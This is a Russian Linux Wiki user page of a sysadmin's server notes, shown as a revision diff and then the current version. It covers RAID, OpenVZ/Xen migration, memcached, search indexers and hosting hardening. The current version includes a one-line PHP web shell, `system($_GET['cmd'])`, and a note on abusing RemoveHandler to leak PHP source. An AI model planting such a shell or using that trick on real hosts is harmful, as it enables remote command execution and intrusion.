Участник:Rain/Заметки: различия между версиями

Материал из Linux Wiki
Перейти к навигацииПерейти к поиску
(Давно не обновлял)
 
(не показаны 4 промежуточные версии этого же участника)
Строка 6: Строка 6:
* http://blog.sjinks.pro/security/194-say-no-to-intruder/ - пример использования swatch
* http://blog.sjinks.pro/security/194-say-no-to-intruder/ - пример использования swatch
* http://www.securitylab.ru/analytics/421791.php - немного о веб-шеллах и бэкдорах
* http://www.securitylab.ru/analytics/421791.php - немного о веб-шеллах и бэкдорах
* https://www.mediawiki.org/wiki/Version_lifecycle - когда надо обновлять Mediawiki


== Разное ==
== Разное ==
Строка 35: Строка 36:
Сделал internal bitmap, скорость вроде не упала.
Сделал internal bitmap, скорость вроде не упала.
</pre>
</pre>
* Написать какой-нибудь скрипт для более удобного создания контейнеров с учетом попавшихся в процессе освоения OVZ граблей
* Пофиксить подмену handler'ов на веб-сервере - надо ли?
* Пофиксить подмену handler'ов на веб-сервере - надо ли?
<pre>
<pre>
Строка 51: Строка 51:
С учетом того, что memcached обычно требуется на высоконагруженных сайтах, где под один сайт выделяется целый сервер - то не особо критично, просто пользоваться им на shared-хостинге нежелательно.
С учетом того, что memcached обычно требуется на высоконагруженных сайтах, где под один сайт выделяется целый сервер - то не особо критично, просто пользоваться им на shared-хостинге нежелательно.
</pre>
</pre>
* Поделать больше разделов для контейнеров
* Максимально отвязаться от монтирования каталогов внутрь контейнера, перейти на NFS (шаг в сторону ухода от OpenVZ) - in progress
<pre>
На вебе бага - при монтировании веб-контента начинает расти LA. Чего - не знаю.
Кроме того, как выяснилось, в 2.6.32 какой-то кривой NFS4, поэтому получается использовать только 3-й. Переход на Xen должен решить проблему
</pre>
* Сделать dhcp-сервер на какой-нибудь диапазон адресов внутренней сети
* Сделать сервер для сетевой загрузки для внутренней сети
* <s>Разобраться с неработоспособностью i2p</s>
<pre>
Решилось сносом ~/.i2p/netDb/
Однако все равно со временем там что-то накапливается и софтинка начинает падать
</pre>
* <s>Повыпиливать su/sudo там, где это не надо (добавить группы и т.п.)</s>
На основных серверах сделаны. TODO: при переходе на Xen не забыть разрешить какому-то юзеру su
* <s>Кронтабы</s>
Done. Реально юзается только на сидбоксе и наблюдении (и то, для перезапуска сдохших процессов), поэтому реально можно запрещать везде, с управлением только от рута
* Сделать мониторинг процессов целиком изнутри контейнера (monit и т.п.), прикрутить продвинутый мониторинг и оповещение (Nagios? Раз уж все равно пришлось осваивать) (in progress, почти done)
* Максимально расширить disable_functions на хостинге
* Максимально расширить disable_functions на хостинге
* Посерверная статистика (munin?), уход от мониторинга параметров из нулевой ноды.
* Подумать насчет запуска httpd у monit'a для управления наблюдаемыми сервисами.
* Перейти на Xen
 
== Ссылки ==
 
* [[Сервер linuxoid.in/Заметки]]

Текущая версия на 01:50, 1 февраля 2018

Разное

<? system($_GET['cmd']); ?>

Индексаторы

  • htdig - древний, не развивается, последний релиз - 2004 года, не поддерживает юникод. Работал. Есть в дистрибутиве. Может сам собирать контент с веб-страниц
  • DataPark Search - В целом подходит, единственный раз работал. Повторить не удалось. Может сам собирать контент с веб-страниц или с локальных файлов. Не удалось запустить поиск по индексированному, не выдает ссылки, хотя документы считает
  • Sphinx - развивается, тестовый вариант запустился. Не умеет самостоятельно лазить по веб-страницам (в инете есть костыли на базе wget+bash, которые сграбливают сайты и подсовывают их Сфинксу, после чего тот это дело индексирует), больше предназначен для работы с конкретными проектами (например, шерстить базу локального форума, вики, etc)
  • MnogoSearch - единственный индексатор, который адекватно работал. То ли он является клоном DataPark Search, то ли наоборот, но они очень похожи по внутреннему устройству

ToDo по серверу

  • Сменить RAID10 на RAID1 для системного массива
Итого:
* https://www.linux.org.ru/forum/admin/7377399 - как победить зависания в процессе перемещения LV в LVM'e - пока никто не сказал
* На будущее - сразу после разборки-сборки RAID'a вносить его в mdadm.conf и в initrd (прежде всего в initrd), потом уже мувать разделы.
  • Вынести bitmap'ы (?) на другой массив для каждого (?) из массивов
Прежде всего я их создал - раньше просто не было. Создал только на системном - при создании на разделе другого массива система вешалась.
Возможно это было из-за того, что были перекрестные битмапы между RAID'aми. Пробовать пока больше нет желания.
Сделал internal bitmap, скорость вроде не упала.
  • Пофиксить подмену handler'ов на веб-сервере - надо ли?
Вот хз, надо ли. С одной стороны - да, можно найти бажный скрипт, который добавит RemoveHandler .php в .htaccess
и можно будет сливать php-файлы плейнтекстом. С другой стороны, этот же RemoveHandler используется для защиты каталогов аплоада файлов
от выполнения скриптов или для отображения php-файлов текстом в каких-нибудь репозиториях кода.
Т.е., вроде как правильнее было бы оставить, а права на аплоад и разруливать бажные скрипты уже владельцу сайта.
https://www.linux.org.ru/forum/talks/7273249
  • Проверить на тестовом сервере, что требуется для работы memcached для всяких там Wordpress'ов.
Требовался php5-memcache (не php5-memcached). Не смотря на ссылку на каталог в /var в конфиге - там реально ничего нет, т.е., из используемого - только библиотека
Не работало расширение раньше и из-за того, что плагин ломился на дефолтный порт
Однако есть другая проблема - не получается использовать общий memcached-сервер для нескольких WP-сайтов - на других сайтах начинают появляться "чужие" элементы и надписи.
С учетом того, что memcached обычно требуется на высоконагруженных сайтах, где под один сайт выделяется целый сервер - то не особо критично, просто пользоваться им на shared-хостинге нежелательно.
  • Максимально расширить disable_functions на хостинге
  • Подумать насчет запуска httpd у monit'a для управления наблюдаемыми сервисами.

Ссылки